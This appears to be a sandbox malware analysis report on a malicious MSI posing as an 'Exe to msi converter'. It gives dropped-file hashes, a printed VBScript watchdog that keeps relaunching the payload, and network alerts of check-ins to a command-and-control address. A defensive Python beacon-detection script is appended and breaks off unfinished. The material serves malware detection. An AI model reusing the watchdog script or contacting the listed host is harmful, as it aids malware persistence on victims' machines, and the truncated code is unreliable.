                                      Preview:...@IXOS.@.....@o,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..sdlvrr.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}.@........RemoveODBC..Removing ODBC components..%._B3D13F97_1369_417D_A477_B4C42B829328
                                      Process:C:\Windows\Installer\MSI4976.tmp
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):821
                                      Entropy (8bit):5.373099872154506
                                      Encrypted:false
                                      SSDEEP:24:dF/UJ8e/U/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UJ8est+G+7xLxe0WABNVIqZaVzgA
                                      MD5:A78E4933B99F0162AECEDD700409FBF7
                                      SHA1:F8897DB5F7DFF8B9E6FDA2B167BECDA1FCD487EC
                                      SHA-256:BC0D674A900BB8FF11781BF25D1621FD01C3A88F05F10AB8160EBAED7BEF218B
                                      SHA-512:743FD4D3B7B5D4C6DA21A66E0058B1E7EAE7AC2BE33FB0D9DCE1442EB34C1C48CE44C241D77E49F7E64F7C0BCE82D62BF8B320553FF167755DA2A0227A07B500
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, Author: Joe Security
                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "MSI4976.tmp"..fileset = """C:\Windows\Installer\MSI4976.tmp"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                      Process:C:\Windows\Installer\MSI4976.tmp
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:35:30 2024, mtime=Mon Dec 30 09:35:30 2024, atime=Mon Dec 30 09:35:30 2024, length=949248, window=hide
                                      Category:dropped
                                      Size (bytes):1802
                                      Entropy (8bit):3.4080805112829275
                                      Encrypted:false
                                      SSDEEP:24:8hql0ZVeMKir4/PGAkw0ksFeXSUE2+s9T4IllBm:8hq4/Kir6P9kw0NsXSGr9MIlL
                                      MD5:C280AFD298C71B38156298E01AA27807
                                      SHA1:85A92C570BF84FCCC32B830222626E50EC2DC163
                                      SHA-256:288B93118FFD058AC8B00B0DA51DE1178C53FC63F1972B28ED92A74B775C3908
                                      SHA-512:0603EEB189B59A622E8FFFB9563A539890C879AB4B24500031E4AA474C2CD5D11890C39A0255CDE65A8AB71A5805556F4B855AB3220D9D4D265B5016FA88B3AA
                                      Malicious:false
                                      Preview:L..................F.@.. ....u...Z.......Z.......Z...|........................:..DG..Yr?.D..U..k0.&...&.......bBDj........Z..{....Z......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.YmT..........................=...A.p.p.D.a.t.a...B.V.1......YkT..Roaming.@......EWsG.YkT.............................R.o.a.m.i.n.g.....V.1......YpT..Windata.@......YpT.YpT..........................>...W.i.n.d.a.t.a.....`.2..|...YpT .SRACMB.exe..F......YpT.YpT....r.....................W...S.R.A.C.M.B...e.x.e......._...............-.......^..............[.....C:\Users\user\AppData\Roaming\Windata\SRACMB.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.S.R.A.C.M.B...e.x.e.(.".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..................................................................................................................
                                      Process:C:\Windows\Installer\MSI4976.tmp
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):949248
                                      Entropy (8bit):7.852650435892493
                                      Encrypted:false
                                      SSDEEP:24576:chloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:chloJf3Ar0pBre25G
                                      MD5:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      SHA1:EB9D46A7390EC9EF0C6FD179EFF8AC7907CCC775
                                      SHA-256:9F4D59259EE6D8A6278DFBDD9603151BC589D59630E667968B75BE1B881EAB54
                                      SHA-512:69CAD723AE1C9693FDA0CD6B742014F53F3153DE32B6A063C4D869B863E0ABC13DA0F9647422A4FF1B85FDEE86DDF1943A8A55CAC27DF3B989658EA71954713C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....>g.........."......P...@...`.......p........@........................... ...........@...@.......@.........................$......../..................(...........................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......4...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Category:dropped
                                      Size (bytes):974848
                                      Entropy (8bit):7.7836156225290445
                                      Encrypted:false
                                      SSDEEP:24576:uErhloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:uErhloJf3Ar0pBre25G
                                      MD5:3E83644E86D6165D35A80650D01DF249
                                      SHA1:F3F82555822EDC27B3EC559686E7D7B23153761B
                                      SHA-256:5CBAE41670F29829CBBEB50560A2184385E25C109DCBF3BFCFF6656BFC09AE32
                                      SHA-512:02051E5A017AF65CDF1ADC3680E93362440E60FA85BDAD6C49592ED20B7A26B9A9B9AC5B71CC8CD25B5441EA69D60A90E8879674B0546DCE00B4A6B8DDB812C3
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):949970
                                      Entropy (8bit):7.852135862047015
                                      Encrypted:false
                                      SSDEEP:24576:HhloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SKL:HhloJf3Ar0pBre25GW
                                      MD5:1D8F64ED80F3B30154CC868B8B95359C
                                      SHA1:FDE2F7D45E45E618A2D818948F4E84556B9F5376
                                      SHA-256:92F94F8FF45D382503DD987CA0A4A35CB33833A6BB869F619EB04C9031DA968E
                                      SHA-512:AEF891E17B70D09BF8247E3D928360B38136FD289CC9CBEA344D3ADB93256CCF1EA1B3C505A3D0E561CEA30CDDFE42ACBCA5455E35CBDED106197BDD3A0C756A
                                      Malicious:false
                                      Preview:...@IXOS.@.....@o,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..sdlvrr.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@.......|..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....>g.........."...
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:modified
                                      Size (bytes):949248
                                      Entropy (8bit):7.852650435892493
                                      Encrypted:false
                                      SSDEEP:24576:chloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:chloJf3Ar0pBre25G
                                      MD5:8C36CF56C0AA2ED05B8EC53CA0BFBAE1
                                      SHA1:EB9D46A7390EC9EF0C6FD179EFF8AC7907CCC775
                                      SHA-256:9F4D59259EE6D8A6278DFBDD9603151BC589D59630E667968B75BE1B881EAB54
                                      SHA-512:69CAD723AE1C9693FDA0CD6B742014F53F3153DE32B6A063C4D869B863E0ABC13DA0F9647422A4FF1B85FDEE86DDF1943A8A55CAC27DF3B989658EA71954713C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....>g.........."......P...@...`.......p........@........................... ...........@...@.......@.........................$......../..................(...........................................H...........................................UPX0.....`..............................UPX1.....P...p...D..................@....rsrc....@.......4...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):49152
                                      Entropy (8bit):0.7683101341214462
                                      Encrypted:false
                                      SSDEEP:12:JSbX72FjjbJAGiLIlHVRpth/7777777777777777777777777vDHFU6eK8pSl0i5:JtJQI5p2hF
                                      MD5:FEDC8BEA658CC75FDEB12389EDC0F1F2
                                      SHA1:398F22FAEDEE9958F284414ABB2D2E1FDE0F3143
                                      SHA-256:0393B43B6FB38353B400348F7BB812B2E079C1B08525991152F3E01B854879FA
                                      SHA-512:2EFFFCAA5262043441A177D9384B62DC3690A955451BAB34746E0E715434FA92F61805610145F02D40F8E70AC1B14224970951725A6B7CD46E7ABA16899BEFEF
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1458944438109988
                                      Encrypted:false
                                      SSDEEP:48:L6DuQZsrMLFXOxT59e3lhlSzUgYsSzfTl:+DrsTTeVhlYRTY
                                      MD5:DA3A1FF557C48ED3EB70F408DE86B3D8
                                      SHA1:D63584EBDD40C7DBB9111A590B8B41A55E05E66F
                                      SHA-256:29AB99E4DA063BF3D71774C81D761ADC1B44150B25B051F2305645B7B278D1C7
                                      SHA-512:F8F0CA894F0E72FF087B60BED648F161D607C400EE3C301F96518171A7A661FA70AB8111B032F9C29AB057B41820529C04EBDFD319EDBFE35D398A8E0113539B
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):360001
                                      Entropy (8bit):5.362968934206052
                                      Encrypted:false
                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauV:zTtbmkExhMJCIpEY
                                      MD5:93FCA1C757D924C9A469C9A94138CA04
                                      SHA1:D7FDB05DA10BF8C7E84D9F2EBC2680A6AE81572C
                                      SHA-256:215BC370599F4FFB6E5C1424DB66481F7FBAD40815C3040E43B238FA017E7CB1
                                      SHA-512:DC7D364FC2ED69D77925EB31875F9D57BE1A52A09887922722D19C6D615D4041C8038CB90578109F7C268C34EC8E210ABFDA0D72580C12A0F6774C388FE498F8
                                      Malicious:false
                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.06947348371947007
                                      Encrypted:false
                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOj46u2uH/QJQ8hQVky6lS:2F0i8n0itFzDHFU6eKdS
                                      MD5:B3973958D9FF98310092BCB5E4D1A4EE
                                      SHA1:07300CB350EA09CAB0618077650413B520B88D95
                                      SHA-256:B8DBE22108A95C620EF9A917833AF8DD26E2ED2106C1221EBEE6ED98CE22752B
                                      SHA-512:1283DDAD20D396A5074FDC67958A91934CC73B99A2CA035A3051DF93FAEB315E3C64440B92230901EFE52373AFE6119BEF2396640C5EE4C78DBDFE7BF8543849
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1458944438109988
                                      Encrypted:false
                                      SSDEEP:48:L6DuQZsrMLFXOxT59e3lhlSzUgYsSzfTl:+DrsTTeVhlYRTY
                                      MD5:DA3A1FF557C48ED3EB70F408DE86B3D8
                                      SHA1:D63584EBDD40C7DBB9111A590B8B41A55E05E66F
                                      SHA-256:29AB99E4DA063BF3D71774C81D761ADC1B44150B25B051F2305645B7B278D1C7
                                      SHA-512:F8F0CA894F0E72FF087B60BED648F161D607C400EE3C301F96518171A7A661FA70AB8111B032F9C29AB057B41820529C04EBDFD319EDBFE35D398A8E0113539B
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):81920
                                      Entropy (8bit):0.0736555263838163
                                      Encrypted:false
                                      SSDEEP:24:ZPA1vb+ipVJ+dipVJ+ZVqKwGZrk62+AO3+:C1T+Sz4SzUgYl2U3+
                                      MD5:739CD46EF02C75184188B80215391639
                                      SHA1:4E1ECF1C64291CEB35E3CFD557E619A8601E71C9
                                      SHA-256:B3DBFD7986D161CA4AFE866AE9EFB6AEE86EE791D9EBD68B36543E09453E1C6E
                                      SHA-512:6D4F04FFBF98F65A95244E5763388896037C0EE59F494EAEE33B0343D581694C710741986244EBAA8769DE147A2258BC0C2806BF79E363C3E20A7A171E490B15
                                      Malicious:false
                                       Preview:........ (non-printable bytes rendered as dots; truncated)
                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Entropy (8bit):7.7836156225290445
                                      TrID:
                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                      File name:sdlvrr.msi
                                      File size:974'848 bytes
                                      MD5:3e83644e86d6165d35a80650d01df249
                                      SHA1:f3f82555822edc27b3ec559686e7d7b23153761b
                                      SHA256:5cbae41670f29829cbbeb50560a2184385e25c109dcbf3bfcff6656bfc09ae32
                                      SHA512:02051e5a017af65cdf1adc3680e93362440e60fa85bdad6c49592ed20b7a26b9a9b9ac5b71cc8cd25b5441ea69d60a90e8879674b0546dce00b4a6b8ddb812c3
                                      SSDEEP:24576:uErhloDX0XOf4Lv6ArAnQ4nCMBBG6e2q7dQGnm2J+SK:uErhloJf3Ar0pBre25G
                                      TLSH:2E25E1E1A740C4A5E8A795798437CAA76423BE1ECCA84A4C3991FF0F7D723475023D9B
                                       File Content Preview:........................>...... (remainder is non-printable bytes, rendered as dots; truncated)
                                      Icon Hash:2d2e3797b32b2b99
                                       Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49984 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49976 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49983 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49985 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49977 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49979 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49980 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49869 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49981 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49982 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49817 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:24.387568+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49929 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:41.848807+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49817 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:35:51.094216+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49869 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:36:00.201860+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49929 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:36:09.217517+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49976 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:36:18.283230+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49977 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:36:27.296276+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49979 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:36:36.378336+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49980 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:36:45.679041+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49981 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:36:59.623794+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49982 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:37:09.091777+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49983 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:37:18.155276+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49984 | 172.111.138.100 | 5552 | TCP
                                       2024-12-30T11:37:27.170694+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.9 | 49985 | 172.111.138.100 | 5552 | TCP
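Every row in the alert table above is the same rule firing on a fresh connection from 192.168.2.9 to 172.111.138.100:5552, and the later rows are spaced about nine seconds apart. Whatever family the signature name refers to, the property worth keying on is that cadence to a fixed destination. The Python below is an added example, not part of the Joe Sandbox report and not Joe Security code: it parses the rows as copied from the table, reduces them to one timestamp per connection, and measures how regular the gaps are. The 25% tolerance, the 80% regularity threshold and the minimum of eight intervals are assumptions chosen for illustration.

```python
"""Beacon-cadence check over the Suricata alert rows of this report.

Added example; not part of the sandbox report and not Joe Security's tooling.
ALERTS is copied from the report's alert table. Thresholds are assumptions.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Rows copied from the report: timestamp, SID, signature, severity, src IP, src port, dst IP, dst port, proto.
ALERTS = """\
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49984 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49976 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49983 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49985 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49977 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49979 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49980 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49869 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49981 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49982 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49817 172.111.138.100 5552 TCP
2024-12-30T11:35:24.387568+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49929 172.111.138.100 5552 TCP
2024-12-30T11:35:41.848807+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49817 172.111.138.100 5552 TCP
2024-12-30T11:35:51.094216+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49869 172.111.138.100 5552 TCP
2024-12-30T11:36:00.201860+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49929 172.111.138.100 5552 TCP
2024-12-30T11:36:09.217517+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49976 172.111.138.100 5552 TCP
2024-12-30T11:36:18.283230+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49977 172.111.138.100 5552 TCP
2024-12-30T11:36:27.296276+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49979 172.111.138.100 5552 TCP
2024-12-30T11:36:36.378336+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49980 172.111.138.100 5552 TCP
2024-12-30T11:36:45.679041+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49981 172.111.138.100 5552 TCP
2024-12-30T11:36:59.623794+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49982 172.111.138.100 5552 TCP
2024-12-30T11:37:09.091777+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49983 172.111.138.100 5552 TCP
2024-12-30T11:37:18.155276+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49984 172.111.138.100 5552 TCP
2024-12-30T11:37:27.170694+0100 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 1 192.168.2.9 49985 172.111.138.100 5552 TCP
"""

ROW = re.compile(
    r"^(?P<ts>\S+)\s+(?P<sid>\d+)\s+(?P<sig>.+?)\s+(?P<sev>\d)\s+"
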